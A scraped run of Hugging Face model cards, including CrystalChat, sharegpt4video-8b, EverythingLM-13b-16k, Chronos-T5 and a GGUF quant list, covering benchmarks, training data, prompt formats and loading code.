A crystal is an ordered, hexagonal lattice of atoms that displays a unique crystal structure resulting in transparency and diverse physical and chemical properties, and as a transparent and open-source language model, "Crystal" might represent transparency and accessibility by enabling users to understand the inner workings of the model.</s>
- example_title: Write python function and explain
text: >-
<s> <|sys_start|> You are an AI assistant. You will be given a task. You
must generate a detailed and long answer. <|sys_end|> <|im_start|> Write a
python function that takes a list of integers and returns the squared sum of
the list. <|im_end|>
output:
text: "\n\nHere's a Python function named `squared_sum_list` that takes a list of integers as input and returns the squared sum of the list:\n\n```python\ndef squared_sum_list(lst):\n\treturn sum([num ** 2 for num in lst])\n```\nThe function `squared_sum_list` uses a list comprehension to iterate over each number in the input list `lst` and calculate its square. Then, it uses the `sum` function to accumulate all the squared numbers in a single value - the squared sum of the list.\n\nFor example:\n\n```python\nnumbers = [1, 2, 3, 4, 5]\nprint(squared_sum_list(numbers)) # Outputs: 55\n```\n\nIn the above code, the list `[1, 2, 3, 4, 5]` is passed as an argument to the `squared_sum_list` function. The function calculates the sum of the squares of the elements in the list, which is `1 + 4 + 9 + 16 + 25 = 55`. The function then returns this result, which is printed to the console.</s>"
tags:
- llm
- code
datasets:
- openaccess-ai-collective/oasst1-guanaco-extended-sharegpt
- Open-Orca/SlimOrca
- AtAndDev/ShareGPT-Vicuna-v3-cleaned-unfiltered
- WizardLM/WizardLM_evol_instruct_V2_196k
- winglian/chatlogs-en-cleaned
- HuggingFaceH4/CodeAlpaca_20K
- theblackcat102/evol-codealpaca-v1
- nickrosh/Evol-Instruct-Code-80k-v1
- open-phi/textbooks
- open-phi/programming_books_llama
- LLM360/CrystalCoderDatasets
model-index:
- name: CrystalChat
results:
- task:
type: text-generation
dataset:
type: openai_humanneval
name: OpenAI HumanEval
metrics:
- name: pass@1 (t=0.2)
type: pass@1
value: 34.116
- name: pass@10 (t=0.8)
type: pass@10
value: 65.755
- task:
type: text-generation
dataset:
type: mbpp
name: Mostly Basic Python Problems (mbpp)
metrics:
- name: pass@1 (t=0.1)
type: pass@1
value: 39.112
- name: pass@10 (t=0.8)
type: pass@10
value: 59.895
- task:
type: multiple-choice
dataset:
type: race
name: RACE
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 41.148
- task:
type: multiple-choice
dataset:
type: mmlu
name: Measuring Massive Multitask Language Understanding (MMLU)
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 53.215
- name: Accuracy (0 shot)
type: accuracy
value: 52.789
- task:
type: multiple-choice
dataset:
type: truthful_qa
name: Truthful QA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 47.29
- task:
type: multiple-choice
dataset:
type: winogrande
name: Winogrande
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 70.639
- name: Accuracy (0 shot)
type: accuracy
value: 68.114
- task:
type: multiple-choice
dataset:
type: copa
name: COPA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 85
- task:
type: text-classification
dataset:
type: boolq
name: Boolq
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 82.783
- task:
type: question-answering
dataset:
type: openbookqa
name: Openbook QA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 42
- task:
type: multiple-choice
dataset:
type: hellaSwag
name: HellaSwag
metrics:
- name: Accuracy (10-shot)
type: accuracy
value: 76.12
- name: Accuracy (0-shot)
type: accuracy
value: 73.312
- task:
type: question-answering
dataset:
type: piqa
name: PIQA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 77.856
- task:
type: question-answering
dataset:
type: ai2_arc
name: ARC (Easy)
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 70.328
- task:
type: question-answering
dataset:
type: ai2_arc
name: ARC (Challenge)
metrics:
- name: Accuracy (25-shot)
type: accuracy
value: 51.706
- name: Accuracy (0-shot)
type: accuracy
value: 44.625
- task:
type: text-generation
dataset:
type: gsm8k
name: GSM8K (Grade School Math 8K)
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 28.052
---
# CrystalChat
We present CrystalChat, an instruction following model finetuned from [LLM360/CrystalCoder](https://huggingface.co/LLM360/CrystalCoder).
CrystalChat pushes the Llama 2 frontier for models excelling at both langauge and coding tasks.
# CrystalChat Performance
| Model | Trained Tokens | Avg. of Avg. | Language Avg. | Coding Avg.
|------------------------|--------------|------------|-------------|-----------|
| CrystalChat 7B | 1.275T | 44.96 | 53.29 | 36.62 |
| Mistral-7B-Instruct-v0.1 | - | 44.34 | 54.86 | 30.62 |
| CodeLlama-7b-Instruct | 2.5T | 40.91 | 45.29 | 36.52 |
| Llama-2-7b-Chat | 2T | 34.11 | 52.86 | 15.35 |
| AmberChat 7B | 1.25T | - | 44.76 | - |
| Model | Trained Tokens | ARC | HellaSwag | MMLU (5-shot) | GSM8K | Winogrande(5-shot) | TruthfulQA | HumanEval (pass@1) | MBPP (pass@1) |
|------------------------|--------------|------------|-------------|-----------|-----|---------|-------------|-----|------------------|
| CrystalChat 7B | 1.275T | 51.71 | 76.12 | 53.22 | 28.05 | 70.64 | 47.29 | 34.12 | 39.11 |
| Mistral-7B-Instruct-v0.1 | - | 58.05 | 75.71 | 55.56 | 32.00 | 74.27 | 55.90 | 29.27 | 31.96 |
| CodeLlama-7b-Instruct | 2.5T | 43.35 | 66.14 | 42.75 | 15.92 | 64.33 | 39.23 | 34.12 | 38.91 |
| Llama-2-7b-Chat | 2T | 53.07 | 78.39 | 48.42 | 18.88 | 73.09 | 45.30 | 13.26 | 17.43 |
| AmberChat 7B | 1.25T | 42.83 | 74.03 | 38.88 | 5.31 | 66.77 | 40.72 | - | - |
| Combined Language and Coding Ability |
|------------------------------------------------|
<img src="CC-Compare.jpg" alt="arc" width="800"/>
| Performance on Standard Benchmarks |
|------------------------------------------------|
<img src="cc-eval-std-benchmarks.png" alt="std-bench" width="800"/>
| Perforamnce on Language Benchmarks |
|---------------------------------------------------------|
<img src="cc-eval-lang-compare.png" alt="arc" width="800"/>
# Instruction Tuning Training
**CrystalChat** is using the last **CrystalCoder** checkpoint of phase2 ([CrystalCoder_phase2_checkpoint_214387](https://huggingface.co/LLM360/CrystalCoder/tree/CrystalCoder_phase2_checkpoint_214387)) as the initialization checkpoint. We then finetune the model using the dataset mentioned below.
We also performed the same finetuning on the last **CrystalCoder** checkpoint of phase3 ([CrystalCoder_phase3_checkpoint_027728](https://huggingface.co/LLM360/CrystalCoder/tree/CrystalCoder_phase3_checkpoint_027728)). The phase2 and phase3 finetuning results are very similar, but phase2 finetuning exhibits slightly better performance on the English language benchmarks. We choose the phase2 finetuning result as the final model for **CrystalChat**.
# Instruction Tuning Data
The fine-tuning data is a mix of publicly available language and code datasets, plus a orginally created dataset called **WebAlpaca** on HTML coding instructions.
The WebAlpaca dataset is created by us and is used as part of our instruction tuning training data. We will release the WebAlpaca dataset in a separate repository soon.
The summary of the fine-tuning data is as follows:
<!-- <center><img src="data_table.jpg" alt="Instruction Data"/></center> -->
| Subset | #Tokens | Avg. #Q | Avg. Query Len | Avg. #R | Avg. Reply Len |
| ----------- | ----------- |----------- |----------- |----------- |----------- |
| [OASST1-guanaco](https://huggingface.co/datasets/openaccess-ai-collective/oasst1-guanaco-extended-sharegpt) | 4,464,640 | 1.36 | 38.28 | 1.36 | 271.69 |
| [SlimOrca](https://huggingface.co/datasets/Open-Orca/SlimOrca) |225,628,160 | 1.00 | 259.16 | 1.00 | 151.12 |
| [ShareGPT](https://huggingface.co/datasets/Aeala/ShareGPT_Vicuna_unfiltered) | 112,914,432 | 3.28 | 94.53 | 3.64 | 365.81 |
| [Evol-ShareGPT](https://huggingface.co/datasets/WizardLM/WizardLM_evol_instruct_V2_196k) | 85,954,560 | 1.00 | 145.99 | 1.00 | 425.17 |
| [ChatLogs](https://huggingface.co/datasets/winglian/chatlogs-en-cleaned) | 29,337,600 | 3.39 | 95.58 | 3.24 | 191.42 |
| [CodeAlpaca](https://huggingface.co/datasets/lucasmccabe-lmi/CodeAlpaca-20k) | 2,623,488 | 1.00 | 32.46 | 1.00 | 67.68 |
| [Rosetta Code](https://github.com/sahil280114/codealpaca/blob/master/data/rosetta_alpaca.json) | 7,987,200 | 1.00 | 450.09 | 1.00 | 533.52 |
| [Evol-CodeAlpaca 1](https://huggingface.co/datasets/theblackcat102/evol-codealpaca-v1) | 73,803,776 | 1.00 | 210.33 | 1.00 | 437.92 |
| [Evol-CodeAlpaca 2](https://huggingface.co/datasets/nickrosh/Evol-Instruct-Code-80k-v1) | 34,910,208 | 1.00 | 114.99 | 1.00 | 300.29 |
| WebAlpaca | 43,673,600 | 1.00 | 96.29 | 1.00 | 746.52 |
| [General Textbooks](https://huggingface.co/datasets/open-phi/textbooks) | 85,590,016 | Not instruction data
| [Programming Books](https://huggingface.co/datasets/open-phi/programming_books_llama) | 395,628,544 | Not instruction data
| Total | 1,102,516,224
For more details, check out the [data table](https://huggingface.co/LLM360/CrystalChat/blob/main/data_table.jpg).
# Instruction Format
We've added some new special tokens to the CrystalCoder tokenizer to support the instruction tuning.
List special tokens used in the instruction tuning:
```
bos: <s>
eos: </s>
system_start: <|sys_start|>
system_end: <|sys_end|>
user_start: <|im_start|>
user_end: <|im_end|>
```
The instruction format is as follows:
```
<s> <|sys_start|> system prompt <|sys_end|> <|im_start|> first user utterance <|im_end|> first model response <|im_start|> next user utterance <|im_end|> next model response </s>
```
# Reproducing the Results
We will release the training code and the training data soon. Our training code is based on [Megatron-LM](https://github.com/NVIDIA/Megatron-LM), with some modifications to support our training data format and Maximal Update Parametrization (μP).
## Model Description
- **Model type:** Language model with the same architecture as LLaMA-7B
- **Language(s) (NLP):** English
- **License:** Apache 2.0
- **Resources for more information:**
- [Training Code](https://github.com/LLM360/crystalcoder-train)
- [Data Preparation](https://github.com/LLM360/crystalcoder-data-prep)
- [Metrics](https://github.com/LLM360/Analysis360)
- [Fully processed CrystalCoder pretraining data](https://huggingface.co/datasets/LLM360/CrystalCoderDatasets)
# Loading CrystalChat
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda:0" if torch.cuda.is_available() else "cpu"
tokenizer = AutoTokenizer.from_pretrained("LLM360/CrystalChat", trust_remote_code=True)
model = AutoModelForCausalLM.from_pretrained("LLM360/CrystalChat", trust_remote_code=True).to(device)
prompt = '<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed and long answer. <|sys_end|> <|im_start|> Write a python function that takes a list of integers and returns the squared sum of the list. <|im_end|>'
input_ids = tokenizer(prompt, return_tensors="pt").input_ids.to(device)
gen_tokens = model.generate(input_ids, do_sample=True, max_length=400)
print("-"*20 + "Output for model" + 20 * '-')
print(tokenizer.batch_decode(gen_tokens)[0])
```
Response:
````
Here's a Python function named `squared_sum_list` that takes a list of integers as input and returns the squared sum of the list:
```python
def squared_sum_list(lst):
return sum([num ** 2 for num in lst])
```
The function `squared_sum_list` uses a list comprehension to iterate over each number in the input list `lst` and calculate its square. Then, it uses the `sum` function to accumulate all the squared numbers in a single value - the squared sum of the list.
For example:
```python
numbers = [1, 2, 3, 4, 5]
print(squared_sum_list(numbers)) # Outputs: 55
```
In the above code, the list `[1, 2, 3, 4, 5]` is passed as an argument to the `squared_sum_list` function. The function calculates the sum of the squares of the elements in the list, which is `1 + 4 + 9 + 16 + 25 = 55`. The function then returns this result, which is printed to the console.</s>
````
Another chat example:
```python
# ...
prompt = '<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed \
and long answer. <|sys_end|> <|im_start|> Give me a one-sentence description of crystal. And tell me what \
might the name "Crystal" mean for a transparant and open-source language model? <|im_end|>'
# ...
```
Response:
```
A crystal is an ordered, hexagonal lattice of atoms that displays a unique crystal structure resulting in transparency and diverse physical and chemical properties, and as a transparent and open-source language model, "Crystal" might represent transparency and accessibility by enabling users to understand the inner workings of the model.</s>
```
# Bias, Risks, and Limitations
CrystalChat has not been aligned to human preferences for safety within the RLHF phase or deployed with in-the-loop filtering of responses like ChatGPT, so the model can produce problematic outputs (especially when prompted to do so). The training data is known and made available [here](https://huggingface.co/datasets/LLM360/CrystalCoderDatasets). It primarily consists of SlimPajama, StarCoder, and WebCrawl dataset.
# Citation
**BibTeX:**
```bibtex
@misc{liu2023llm360,
title={LLM360: Towards Fully Transparent Open-Source LLMs},
author={Zhengzhong Liu and Aurick Qiao and Willie Neiswanger and Hongyi Wang and Bowen Tan and Tianhua Tao and Junbo Li and Yuqi Wang and Suqi Sun and Omkar Pangarkar and Richard Fan and Yi Gu and Victor Miller and Yonghao Zhuang and Guowei He and Haonan Li and Fajri Koto and Liping Tang and Nikhil Ranjan and Zhiqiang Shen and Xuguang Ren and Roberto Iriondo and Cun Mu and Zhiting Hu and Mark Schulze and Preslav Nakov and Tim Baldwin and Eric P. Xing},
year={2023},
eprint={2312.06550},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
## About LLM360
LLM360 is an initiative for comprehensive and fully open-sourced LLMs,
where all training details, model checkpoints, intermediate results, and
additional analyses are made available to the community. Our goal is to advance
the field by inviting the community to deepen the understanding of LLMs
together. As the first step of the project LLM360, we release all intermediate
model checkpoints, our fully-prepared pre-training dataset, all source code and
configurations, and training details. We are
committed to continually pushing the boundaries of LLMs through this open-source
effort.
[Visit Us](https://www.llm360.ai/) |
Lin-Chen/sharegpt4video-8b | Lin-Chen | "2024-07-01T17:53:43Z" | 3,578 | 24 | transformers | [
"transformers",
"safetensors",
"llava_llama",
"text-generation",
"visual-question-answering",
"dataset:Lin-Chen/ShareGPT4V",
"dataset:ShareGPT4Video/ShareGPT4Video",
"arxiv:2406.04325",
"license:apache-2.0",
"autotrain_compatible",
"region:us"
] | visual-question-answering | "2024-05-26T17:42:40Z" | ---
license: apache-2.0
inference: false
datasets:
- Lin-Chen/ShareGPT4V
- ShareGPT4Video/ShareGPT4Video
pipeline_tag: visual-question-answering
---
<br>
<br>
# sharegpt4video-8b Model Card
## Model details
**Model type:**
sharegpt4video-8b is an open-source video chatbot trained by fine-tuning the entire model on open-source [video instruction data](https://huggingface.co/datasets/ShareGPT4Video/ShareGPT4Video). The training process takes around 5 hour on 32xA100 GPUs.
**Model date:**
sharegpt4video-8b was trained in May 2024.
**Paper or resources for more information:**
[[Code](https://github.com/ShareGPT4Omni/ShareGPT4Video)] [[Project Page](https://sharegpt4video.github.io/)]
## Usage
You can utilize this model as we provide in our [[repository](https://github.com/ShareGPT4Omni/ShareGPT4Video)].
## Training dataset
All training data are open-sourced, you can find the usage in our [repository](https://github.com/ShareGPT4Omni/ShareGPT4Video).
- 153K collection of various video instruction data
- 28K high-quality video caption data from [[ShareGPT4Video](https://huggingface.co/datasets/ShareGPT4Video/ShareGPT4Video)]
## Intended use
**Primary intended uses:**
The primary use of sharegpt4video-8b is research on large video-language models and video chatbots.
**Primary intended users:**
The primary intended users of the model are researchers and hobbyists in computer vision, natural language processing, machine learning, and artificial intelligence.
## Paper
arxiv.org/abs/2406.04325
|
manishaaaaa/model | manishaaaaa | "2024-06-28T07:01:20Z" | 3,578 | 0 | transformers | [
"transformers",
"safetensors",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"trl",
"en",
"base_model:unsloth/llama-3-8b-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-28T05:11:44Z" | ---
base_model: unsloth/llama-3-8b-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
---
# Uploaded model
- **Developed by:** manishaaaaa
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-Instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
totally-not-an-llm/EverythingLM-13b-16k | totally-not-an-llm | "2024-04-23T23:31:32Z" | 3,577 | 33 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"dataset:totally-not-an-llm/EverythingLM-data",
"license:llama2",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-08-12T07:00:47Z" | ---
license: llama2
datasets:
- totally-not-an-llm/EverythingLM-data
---
# EverythingLM-13b-16k
Introducing EverythingLM, a llama-2 based, general-purpose 13b model with 16k context thanks to LlongMa. The model is trained on the EverythingLM dataset, more info can be found on the dataset page.
The model is completely uncensored.
This model is an early test of the EverythingLM dataset and some new experimental principles, so don't consider it SOTA.
### GGML quants:
https://huggingface.co/TheBloke/EverythingLM-13B-16K-GGML
Make sure to use correct rope scaling settings:
`-c 16384 --rope-freq-base 10000 --rope-freq-scale 0.25`
### GPTQ quants:
https://huggingface.co/TheBloke/EverythingLM-13B-16K-GPTQ
### Notable features:
- Automatically triggered CoT reasoning.
- Verbose and detailed replies.
- Creative stories.
- Better prompt understanding.
### Prompt format:
It is a modified Vicuna format, the same used in many of ehartford's models.
```
You are a helpful AI assistant.
USER: <prompt>
ASSISTANT:
```
Training took about 1 hour using QLoRa on 1xA100, so this model can be recreated for about $3. QLoRa model can be found here: https://huggingface.co/totally-not-an-llm/EverythingLM-13b-peft.
### Model quirks:
- Due to the nature of the dataset, it does better with more detail. I've found it gives much better stories when I provide more requirements.
- It really likes to use numbered lists. I don't necessarilly have a problem with this but it's something to note when training on the dataset.
- It likes to write fairy tales over anything else, which is strange. This can easily be fixed by prompting.
- Occasionally it will fall into repetition, this seems to be a commmon issue with llama-2 models.
- Haven't tested pushing it all the way to 16k context.
### Future plans:
- Native finetune.
- Other model sizes.
- Improve dataset by:
- Regenerating using gpt-4.
- A bit more data with more diversity.
- Refactor dataset generation script.
- Test some model merges using this model.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_totally-not-an-llm__EverythingLM-13b-16k)
| Metric | Value |
|-----------------------|---------------------------|
| Avg. | 45.7 |
| ARC (25-shot) | 56.57 |
| HellaSwag (10-shot) | 80.58 |
| MMLU (5-shot) | 50.18 |
| TruthfulQA (0-shot) | 47.46 |
| Winogrande (5-shot) | 72.77 |
| GSM8K (5-shot) | 6.44 |
| DROP (3-shot) | 5.89 |
|
autogluon/chronos-t5-small | autogluon | "2024-05-13T21:08:16Z" | 3,577 | 1 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"time series",
"forecasting",
"pretrained models",
"foundation models",
"time series foundation models",
"time-series",
"time-series-forecasting",
"arxiv:2403.07815",
"arxiv:1910.10683",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | time-series-forecasting | "2024-05-14T15:55:51Z" | ---
license: apache-2.0
pipeline_tag: time-series-forecasting
tags:
- time series
- forecasting
- pretrained models
- foundation models
- time series foundation models
- time-series
---
# Chronos-T5 (Small)
Chronos is a family of **pretrained time series forecasting models** based on language model architectures. A time series is transformed into a sequence of tokens via scaling and quantization, and a language model is trained on these tokens using the cross-entropy loss. Once trained, probabilistic forecasts are obtained by sampling multiple future trajectories given the historical context. Chronos models have been trained on a large corpus of publicly available time series data, as well as synthetic data generated using Gaussian processes.
For details on Chronos models, training data and procedures, and experimental results, please refer to the paper [Chronos: Learning the Language of Time Series](https://arxiv.org/abs/2403.07815).
<p align="center">
<img src="figures/main-figure.png" width="100%">
<br />
<span>
Fig. 1: High-level depiction of Chronos. (<b>Left</b>) The input time series is scaled and quantized to obtain a sequence of tokens. (<b>Center</b>) The tokens are fed into a language model which may either be an encoder-decoder or a decoder-only model. The model is trained using the cross-entropy loss. (<b>Right</b>) During inference, we autoregressively sample tokens from the model and map them back to numerical values. Multiple trajectories are sampled to obtain a predictive distribution.
</span>
</p>
---
## Architecture
The models in this repository are based on the [T5 architecture](https://arxiv.org/abs/1910.10683). The only difference is in the vocabulary size: Chronos-T5 models use 4096 different tokens, compared to 32128 of the original T5 models, resulting in fewer parameters.
| Model | Parameters | Based on |
| ---------------------------------------------------------------------- | ---------- | ---------------------------------------------------------------------- |
| [**chronos-t5-tiny**](https://huggingface.co/amazon/chronos-t5-tiny) | 8M | [t5-efficient-tiny](https://huggingface.co/google/t5-efficient-tiny) |
| [**chronos-t5-mini**](https://huggingface.co/amazon/chronos-t5-mini) | 20M | [t5-efficient-mini](https://huggingface.co/google/t5-efficient-mini) |
| [**chronos-t5-small**](https://huggingface.co/amazon/chronos-t5-small) | 46M | [t5-efficient-small](https://huggingface.co/google/t5-efficient-small) |
| [**chronos-t5-base**](https://huggingface.co/amazon/chronos-t5-base) | 200M | [t5-efficient-base](https://huggingface.co/google/t5-efficient-base) |
| [**chronos-t5-large**](https://huggingface.co/amazon/chronos-t5-large) | 710M | [t5-efficient-large](https://huggingface.co/google/t5-efficient-large) |
## Usage
To perform inference with Chronos models, install the package in the GitHub [companion repo](https://github.com/amazon-science/chronos-forecasting) by running:
```
pip install git+https://github.com/amazon-science/chronos-forecasting.git
```
A minimal example showing how to perform inference using Chronos models:
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import torch
from chronos import ChronosPipeline
pipeline = ChronosPipeline.from_pretrained(
"amazon/chronos-t5-small",
device_map="cuda",
torch_dtype=torch.bfloat16,
)
df = pd.read_csv("https://raw.githubusercontent.com/AileenNielsen/TimeSeriesAnalysisWithPython/master/data/AirPassengers.csv")
# context must be either a 1D tensor, a list of 1D tensors,
# or a left-padded 2D tensor with batch as the first dimension
context = torch.tensor(df["#Passengers"])
prediction_length = 12
forecast = pipeline.predict(context, prediction_length) # shape [num_series, num_samples, prediction_length]
# visualize the forecast
forecast_index = range(len(df), len(df) + prediction_length)
low, median, high = np.quantile(forecast[0].numpy(), [0.1, 0.5, 0.9], axis=0)
plt.figure(figsize=(8, 4))
plt.plot(df["#Passengers"], color="royalblue", label="historical data")
plt.plot(forecast_index, median, color="tomato", label="median forecast")
plt.fill_between(forecast_index, low, high, color="tomato", alpha=0.3, label="80% prediction interval")
plt.legend()
plt.grid()
plt.show()
```
## Citation
If you find Chronos models useful for your research, please consider citing the associated [paper](https://arxiv.org/abs/2403.07815):
```
@article{ansari2024chronos,
author = {Ansari, Abdul Fatir and Stella, Lorenzo and Turkmen, Caner and Zhang, Xiyuan, and Mercado, Pedro and Shen, Huibin and Shchur, Oleksandr and Rangapuram, Syama Syndar and Pineda Arango, Sebastian and Kapoor, Shubham and Zschiegner, Jasper and Maddix, Danielle C. and Mahoney, Michael W. and Torkkola, Kari and Gordon Wilson, Andrew and Bohlke-Schneider, Michael and Wang, Yuyang},
title = {Chronos: Learning the Language of Time Series},
journal = {arXiv preprint arXiv:2403.07815},
year = {2024}
}
```
## Security
See [CONTRIBUTING](CONTRIBUTING.md#security-issue-notifications) for more information.
## License
This project is licensed under the Apache-2.0 License.
|
Niggendar/duchaitenPonyXLNo_v35 | Niggendar | "2024-05-24T10:56:45Z" | 3,577 | 2 | diffusers | [
"diffusers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"diffusers:StableDiffusionXLPipeline",
"region:us"
] | text-to-image | "2024-05-24T10:49:20Z" | ---
library_name: diffusers
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🧨 diffusers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
mradermacher/NOVA-1.5B-Instruct-2-GGUF | mradermacher | "2024-06-30T18:52:49Z" | 3,574 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:VAIBHAV22334455/NOVA-1.5B-Instruct-2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-30T18:47:04Z" | ---
base_model: VAIBHAV22334455/NOVA-1.5B-Instruct-2
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/VAIBHAV22334455/NOVA-1.5B-Instruct-2
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_XS.gguf) | IQ3_XS | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_S.gguf) | IQ3_S | 0.9 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_M.gguf) | IQ3_M | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
